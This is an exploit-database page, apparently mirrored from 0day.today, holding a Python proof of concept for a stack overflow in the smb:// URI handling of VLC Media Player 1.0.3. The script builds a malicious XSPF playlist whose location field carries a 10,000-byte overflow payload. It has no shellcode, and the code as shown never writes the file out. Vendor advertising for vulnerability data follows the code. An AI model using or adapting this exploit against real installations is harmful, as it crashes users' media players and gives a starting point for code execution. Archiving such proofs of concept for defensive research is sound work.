Lucene search
K

VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC

🗓️ 06 Dec 2009 00:00:00Reported by Dr_IDEType 
zdt
 zdt
🔗 0day.today👁 22 Views

VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow Po

Code
====================================================================
VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
====================================================================

# Title: VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr_IDE
# Published: 2009-12-06
# Verified: yes

view source
print?
#!/usr/bin/env python
 
######################################################################################################
#
# VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# Found By: Dr_IDE
# Tested:   Windows 7
# Download: http://www.videolan.org
# Note:     Open the .xspf file. It looks like nothing happens but close VLC you will get a crash
#
######################################################################################################
 
header1 =  ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://[email protected]/foo/#{")
 
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
 
header2 =  ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");



#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation